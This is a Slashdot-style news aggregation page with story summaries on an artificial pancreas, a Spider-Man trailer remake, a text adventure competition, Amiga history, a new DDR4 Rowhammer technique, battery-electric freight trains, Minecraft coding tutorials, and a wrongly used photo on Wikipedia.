A Smart Artificial Pancreas Could Conquer Diabetes (ieee.org) 58

IEEE Spectrum reports on the progress being made to develop a "smart artificial pancreas" that senses blood glucose and administers insulin accordingly. An anonymous reader shares an excerpt from the report: The artificial pancreas is finally at hand. This is a machine that senses any change in blood glucose and directs a pump to administer either more or less insulin, a task that may be compared to the way a thermostat coupled to an HVAC system controls the temperature of a house. All commercial artificial pancreas systems are still "hybrid," meaning that users are required to estimate the carbohydrates in a meal they're about to consume and thus assist the system with glucose control. Nevertheless, the artificial pancreas is a triumph of biotechnology.

It is a triumph of hope, as well. We well remember a morning in late December of 2005, when experts in diabetes technology and bioengineering gathered in the Lister Hill Auditorium at the National Institutes of Health in Bethesda, Md. By that point, existing technology enabled people with diabetes to track their blood glucose levels and use those readings to estimate the amount of insulin they needed. The problem was how to remove human intervention from the equation. A distinguished scientist took the podium and explained that biology's glucose-regulation mechanism was far too complex to be artificially replicated. [Boris Kovatchev, a scientist at the University of Virginia, director of the UVA Center for Diabetes Technology, and a principal investigator of the JDRF Artificial Pancreas Project] and his colleagues disagreed, and after 14 years of work they were able to prove the scientist wrong.

It was yet another confirmation of Arthur Clarke's First Law: "When a distinguished but elderly scientist states that something is possible, he is almost certainly right. When he states that something is impossible, he is very probably wrong." [...] Progress toward better automatic control will be gradual; we anticipate a smooth transition from hybrid to full autonomy, when the patient never intervenes. Work is underway on using faster-acting insulins that are now in clinical trials. Perhaps one day it will make sense to implant the artificial pancreas within the abdominal cavity, where the insulin can be fed directly into the bloodstream, for still faster action. What comes next? Well, what else seems impossible today?

Youtube

'Spider-Man: No Way Home' Trailer Remade With Footage From the 1990's Cartoon (cnet.com) 30

Long-time Slashdot reader destinyland writes: This week Marvel released an epic three-minute trailer hyping December's releases of Spider-Man: No Way Home. "It comes after the initial trailer, which focused on the movie's multiversal villains, broke YouTube records over the summer," CNET reported Tuesday (racking up 355.5 million views in its first 24 hours).

But then one more universe collided...

Basically, some internet wise guys re-edited the trailer, splicing its audio over clips from the Fox Kids' 1994 cartoon series Spider-Man. (Opening credits here.) "This has no right being this good," argues CNET — especially since the actual movie's trailer arrived "amidst a ludicrous amount of fanfare and hype."

But it's all oddly appropriate, since CNET notes the upcoming movie features five sinister villains from nearly 20 years of Spider-Man movies, reaching back to the Tobey Maguire and Andrew Garfield era ("likely spurred on by the events of the Disney Plus Loki series.")

So maybe it's fitting that it was also invaded by the television cartoon universe...

Classic Games (Games)

27th Annual Text Adventure Competition Won By Game About - Text Adventures (ifcomp.org) 23

DevNull127 writes: Saturday afternoon, 91 geeks huddled around a Twitch stream to hear the winners announced for the 27th Annual Interactive Fiction Competition. This year's competition attracted 71 entries, and $10,396 was raised for a cash-prize fund (which is divided among all the game authors whose entries ranked in the top two-thirds, with the first-place finisher receiving a prize in the hundreds of dollars and the last entry in the top two-thirds receiving $10). But there's also a long list of fun non-cash prizes available in a "prize pool," and starting with the author of the first-place game, authors take their turn choosing. (Prizes included everything from 0.055 in Ethereum cryptocurrency to the conversion of your text adventure into a professionally-produced audiobook.)

After a six-week period where the general public played and voted on the 71 games, the first-place winner was chosen. It had a strange title — "And Then You Come to a House Not Unlike the Previous One." Its welcome screen jokingly promises "the latest in ASCII graphic technology to occasionally write high-res, text-based images directly onto a screen that is eighty characters wide or more..." In this text adventure game you play a teenager who starts out... playing a text adventure game (called "THE GLUTTONOUS ELF: Adventure #1"), with the game itself ultimately offering a kind of meta-commentary on the world of text adventures over the years.

Perhaps not surprisingly, this game also won a second award — the contest's special prize for the entry most-liked by the other games' authors who'd entered this year's competition.

This year's runner-up was "Dr Horror's House of Terror". It's not to be confused with the Christopher Lee/Peter Cushing movie with a similar name — except perhaps with some playful and intentional overlap which becomes apparent as the game progresses.

And a splendid time was had by all.

Amiga

The Last Days of Amiga - and the Lost Amiga CD64 (youtube.com) 46

This week Mike Bouma (Slashdot reader #85,252) looked back nearly 30 years to the glory days of the world's first true 32-bit CD based home console — Commodore's Amiga32. In the final three months of 1993, the company had sold 100,000 in just three months in Europe, outselling Sega four to one, "and claiming 38% market share of all CD ROM drives sold in the U.K. (according to the Gallup Weekly Report)."

But the next year it was all over, Mike Bouma writes, summarizing reports from both Amiga Report and Wikipedia: Operations in Germany and the United Kingdom were still profitable, but Commodore was not able to meet demand for new units because of component supply problems — and could not release the (already made) Amiga CD32 stock in the United States due to a legal patent issue!

Commodore declared bankruptcy on April 29, 1994, causing the CD32 to be discontinued only eight months after its debut.

This look back was apparently inspired by a report from retro gaming vlogger Lady Decade about what then happened to the Amiga CD32 after Commodore's demise — and about the system that would've been its successor: the lost Amiga64.

Earlier this week Mike shared the news that attempts to make a 'Doom' clone for the Amiga 500 have already led to a demo map (for both Amiga 500s with one megabyte of RAM and Atari STs with two megabytes of RAM).

And for more vintage retro-gaming goodness, Mike adds that "In my opinion the most impressive game released for the system was Super Stardust by Bloodhouse, published by Team17." It was the sequel to Stardust for the Amiga 500 and Atari STE. Bloodhouse merged with Terramarque (famous for their impressive Amiga 500 game Elfmania) to form Housemarque, which is still making games as of today.
Hardware

DDR4 Memory Protections Are Broken Wide Open By New Rowhammer Technique (arstechnica.com) 115

"An unprivileged application can corrupt data in memory by accessing 'hammering' rows of DDR4 memory in certain patterns millions of times a second, giving those untrusted applications nearly unfettered system privileges," writes long-time Slashdot reader shoor. Ars Technica reports: Rowhammer attacks work by accessing -- or hammering -- physical rows inside vulnerable chips millions of times per second in ways that cause bits in neighboring rows to flip, meaning 1s turn to 0s and vice versa. Researchers have shown the attacks can be used to give untrusted applications nearly unfettered system privileges, bypass security sandboxes designed to keep malicious code from accessing sensitive operating system resources, and root or infect Android devices, among other things. All previous Rowhammer attacks have hammered rows with uniform patterns, such as single-sided, double-sided, or n-sided. In all three cases, these "aggressor" rows -- meaning those that cause bitflips in nearby "victim" rows -- are accessed the same number of times.

Research published on Monday presented a new Rowhammer technique. It uses non-uniform patterns that access two or more aggressor rows with different frequencies. The result: all 40 of the randomly selected DIMMs in a test pool experienced bitflips, up from 13 out of 42 chips tested in previous work (PDF) from the same researchers. "We found that by creating special memory access patterns we can bypass all mitigations that are deployed inside DRAM," Kaveh Razavi and Patrick Jattke, two of the research authors, wrote in an email. "This increases the number of devices that can potentially be hacked with known attacks to 80 percent, according to our analysis. These issues cannot be patched due to their hardware nature and will remain with us for many years to come."

The non-uniform patterns work against Target Row Refresh. Abbreviated as TRR, the mitigation works differently from vendor to vendor but generally tracks the number of times a row is accessed and recharges neighboring victim rows when there are signs of abuse. The neutering of this defense puts further pressure on chipmakers to mitigate a class of attacks that many people thought more recent types of memory chips were resistant to. In Monday's paper, the researchers wrote: "Proprietary, undocumented in-DRAM TRR is currently the only mitigation that stands between Rowhammer and attackers exploiting it in various scenarios such as browsers, mobile phones, the cloud, and even over the network. In this paper, we show how deviations from known uniform Rowhammer access patterns allow attackers to flip bits on all 40 recently-acquired DDR4 DIMMs, 2.6x more than the state of the art. The effectiveness of these new non-uniform patterns in bypassing TRR highlights the need for a more principled approach to address Rowhammer."

While PCs, laptops, and mobile phones are most affected by the new findings, the report notes that cloud services like AWS and Azure "remain largely safe from Rowhammer because they use higher-end chips that include a defense known as ECC, short for Error Correcting Code."

"Concluding, our work confirms that the DRAM vendors' claims about Rowhammer protections are false and lure you into a false sense of security," the researchers wrote. "All currently deployed mitigations are insufficient to fully protect against Rowhammer. Our novel patterns show that attackers can more easily exploit systems than previously assumed."
Power

Can We Use Big Batteries to Power Our Trains? (arstechnica.com) 238

Research studying the possibility of electrifying rail-based freight "finds that the technology is pretty much ready," reports Ars Technica, "and under the right circumstances, the economics are on the verge of working out."

It helps that the price of batteries has dropped 87% over the last decade: In the U.S., the typical freight car travels an average of 241 kilometers per day when in operation. So the researchers created a battery big enough to move that distance as part of a large freight train (four locomotives, 100 freight cars, and about 7,000 tonnes of payload). They found that lithium ferrous phosphate would let each of the four locomotives be serviced by a single freight car configured as a giant battery. The battery would only occupy 40 percent of the volume of a typical boxcar and would be seven tonnes below the weight limit imposed by existing bridges. Because of the efficiency of direct electric power, the train would use only half the energy consumed by an internal combustion engine driving an on-board generator...

Using an economic measure called the "net present value," the researchers determine that switching to batteries alone would cost $15 billion. But taking the pollution damages into account turns the number into a $44 billion savings. Considering climate damages as well boosts the savings to $94 billion. Even if these damages are ignored, a rise in the price of diesel and allowing freight companies to buy power at wholesale rates come close to shifting the costs to neutral... [F]reight companies could use their capacity to provide grid stabilization services or sell back power when the price gets high. In extreme cases, this system could actually pay for the entire infrastructure.

"Preliminary estimates of the most expensive 90 hours per year in the ERCOT [Texas] market, for example, show that batteries could be discharged at $200/kWh, potentially generating enough revenue to pay for the upfront battery cost in a single year," the study says.

Special thanks to clovis (Slashdot reader #4,684) for the submission — and for also sharing "some general info about diesel-electric locomotives" and "some detail on the AC-DC-AC drive."
Education

Microsoft Is Very Determined That Kids Will Learn To Code Using Minecraft 56

theodp writes: On Tuesday, Code.org announced that the new activities for kids in this year's Hour Of Code will include yet another Minecraft-themed tutorial from Code.org Diamond Supporter Microsoft, making it seven years in a row that the best-selling videogame of all time has 'headlined' the Hour of Code during the holiday buying season. Going into the Hour of Code in 2018, Microsoft boasted that 100+ million Minecraft Hour of Code tutorials had already been logged by students.

In this year's Hour of Code: TimeCraft tutorial, kids will "learn basic coding concepts to correct mysterious mishaps throughout history!" An accompanying one-size-fits-all lesson plan for ages 6-18 instructs students to: "Experience a choose-your-own-adventure game, exploring key moments in human achievement. Using your coding superpowers, save the future by solving mysterious mishaps in time." Among other things, the coding challenges have K-12 students travel back in time to save Jazz from a kazoo future, prevent the Great Pyramids from being built as cubes, save the Great Wall of China from destruction by pandas, and wipe the frown off of the Mona Lisa. New this year, Microsoft notes, is that educators can sign up to have a Microsoft Education Expert lead their classroom through an Hour of Code lesson with Minecraft, thanks to the magic of Microsoft Teams Live Events.
Wikipedia

Wikipedia Criticized After Years of Using the Wrong Man's Picture to Depict a Serial Killer (wikipedia.org) 113

Andreas Kolbe is a former co-editor-in-chief of The Signpost, an online newspaper for (English-language) Wikipedia that's been published online since 2005 with contributions from Wikipedia editors. Kolbe has been contributing to it since 2006.

Last week he returned to the Signpost to share a cautionary tale. Its title? "A photo on Wikipedia can ruin your life."

Also a long-time Slashdot reader, Andreas Kolbe shares this summary with us: For more than two years, Wikipedia illustrated its article on New York serial killer Nathaniel White with the police photo of an African-American man from Florida who happened to have the same name. A Wikipedia user said he had found the picture on crimefeed.com, a "true crime" site associated with the Discovery Channel, which also used the same photo in a TV broadcast on the serial killer.

During the two-and-a-half years the Wikipedia article showed the picture of the wrong man, it was viewed over 125,000 times, including nearly 12,000 times on the day the TV program ran. The man whose picture was used said he received threats to his person from people who assumed he really was the killer, and took to dressing incognito.

His picture is now all over Google when people search for the serial killer.

"Friends and family contacted Plaintiff concerning the broadcast and asking Plaintiff if he actually murdered people in the state of New York," adds a legal complaint the man eventually filed against the Wikimedia Foundation. "Plaintiff assured these friends and family that even though he acknowledged his criminal past, he never murdered anyone nor has he ever been to the state of New York...."

Last month the legal director of the Wikimedia Foundation and a Legal Fellow co-authored a blog post pointing out the lawsuit "was filed months after Wikipedia editors proactively corrected the error at issue in September 2020." The blog post celebrates a judge's dismissal of the suit as "a victory for free knowledge," and acknowledges the protections afforded by Section 230 of the Communications Decency Act. "Our ability to maintain and grow the world's largest repository of free knowledge depends on robust legal immunity.... The Wikimedia Foundation applauds this ruling and remains committed to protecting global exchange of knowledge and freedom of expression across the internet."

But the blog post also argued that "the many members of our volunteer community are very effective at identifying and removing these inaccuracies when they do occur." Andreas Kolbe disagrees. "The photo was in the article for over two years," Kolbe writes on Signpost. "For a man to have his face presented to the world as that of a serial killer on a top-20 website, for such a significant amount of time, can hardly be described as indicative of 'very effective' quality control on the part of the community." The picture was only removed after a press report pointed out that Wikipedia had the wrong picture. This means the deletion was in all likelihood reactive rather than "proactive"...

The wrong photograph appears to have been removed by an unknown member of the public, an IP address that had never edited before and has not edited since. The volunteer community seems to have been completely unaware of the problem throughout...

It would seem more appropriate -

- to acknowledge that community processes failed Mr. White to a quite egregious degree, and
- to alert the community to the fact that its quality control processes are in need of improvement....

Surely Wikipedia's guidelines, policies and community practices for sourcing images, in particular images used to imply responsibility for specific crimes, would benefit from some strengthening, to ensure they actually depict the correct individual.

Pondering the dismissal of the lawsuit, Kolbe ultimately asks if there's a deeper moral question in a world where a man was "defamed on our global top-20 website with absolute impunity, without his having any realistic hope of redress for what happened to him." While to the best of my belief the error did not originate in Wikipedia, but was imported into Wikipedia from an unreliable external site, for more than two years any vigilante Googling Nathaniel White serial killer would have seen Mr. White's color picture prominently displayed in Google's knowledge graph panel (multiple copies of it still appear there at the time of writing). And along with it they would have found a prominent link to the serial killer's Wikipedia biography, again featuring Mr. White's image — providing what looked like encyclopedic confirmation that Mr. White of Florida was indeed guilty of sickening crimes...

On the very day the picture was removed from the article here, a video about the serial killer was uploaded to YouTube — complete with Mr. White's picture, citing Wikipedia. At the time of writing, the video's title page with Mr. White's color picture is the top Google image result in searches for the serial killer. All in all, seven of Google's top-fifteen image search results for Nathaniel White serial killer today feature Mr. White's image. Only two black-and-white photos show what seems to have been the real killer.

A comment on the Wikimedia Foundation blog adds, "What I'd much rather see is an acknowledgement that the community process failed Mr White to an extreme degree and that steps will be taken to prevent recurrence of such cases."
